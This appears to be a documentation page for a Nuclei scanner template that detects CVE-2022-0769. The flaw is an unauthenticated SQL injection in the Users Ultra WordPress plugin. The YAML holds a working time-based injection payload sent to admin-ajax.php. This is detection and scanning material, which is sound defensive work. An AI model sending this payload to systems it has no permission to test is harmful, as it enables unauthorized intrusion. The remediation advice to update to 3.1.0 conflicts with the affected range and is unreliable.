Users Ultra <= 3.1.0 - SQL Injection
ID: CVE-2022-0769
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
Description
Section titled “Description”The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.
YAML Source
Section titled “YAML Source”id: CVE-2022-0769
info: name: Users Ultra <= 3.1.0 - SQL Injection author: theamanrawat severity: critical description: | The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/05eab45d-ebe9-440f-b9c3-73ec40ef1141 - https://wordpress.org/plugins/users-ultra/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0769 - https://github.com/ARPSyndicate/cvemon - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 epss-score: 0.02367 epss-percentile: 0.89814 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: usersultra product: users_ultra framework: wordpress tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra
http: - raw: - | @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "You have to be logged in to leave your rate")' condition: and# digest: 4a0a00473045022100aa7bce1f28f4d7205520411cbe018c8f94f5b562ae1ee6b74a771cf68d48f5f1022000f52e9282f9d89f178785be0b816c170826ea14d3857c79ccd232fcfa4400b0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0769.yaml"